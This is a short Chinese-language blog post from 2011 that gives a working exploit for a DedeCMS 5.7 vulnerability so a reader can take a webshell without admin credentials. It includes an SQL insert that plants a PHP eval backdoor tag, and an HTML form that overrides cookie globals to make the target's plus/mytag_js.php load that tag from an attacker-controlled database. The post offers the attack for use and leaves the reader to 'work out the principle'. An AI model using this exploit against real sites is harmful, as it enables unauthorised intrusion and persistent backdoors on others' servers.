网站技术 · 2011 年 09 月 01 日 0

dedecms 5.7最新0day利用不进后台直接拿WEBSHELL

配合刚暴的织梦不用管理员帐号和密码就能进后台的漏洞
(http://www.tmdsb.com/2011/08/dedecms-weaving-dreams-seriously-0day-vulnerabilities-latest-storm/)

拿webshell的方法如下:

网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.

前题条件,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen(“1.php”, \’a\’);@fwrite($fp, \'<?php eval($_POST[c]) ?>\’);echo “OK”;@fclose($fp);{/dede:php}’);

再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。

<form action=”” method=”post” name=”QuickSearch” id=”QuickSearch”>
<input type=”text” value=”http://www.tmdsb.com/plus/mytag_js.php?aid=1″ name=”doaction” style=”width:400″><br />
<input type=”text” value=”dbhost” name=”_COOKIE[GLOBALS][cfg_dbhost]” style=”width:400″><br />
<input type=”text” value=”dbuser” name=”_COOKIE[GLOBALS][cfg_dbuser]” style=”width:400″><br />
<input type=”text” value=”dbpwd” name=”_COOKIE[GLOBALS][cfg_dbpwd]” style=”width:400″><br />
<input type=”text” value=”dbname” name=”_COOKIE[GLOBALS][cfg_dbname]” style=”width:400″><br />
<input type=”text” value=”dede_” name=”_COOKIE[GLOBALS][cfg_dbprefix]” style=”width:400″><br />
<input type=”text” value=”true” name=”nocache” style=”width:400″>
<input type=”submit” value=”提交” name=”QuickSearchBtn”><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>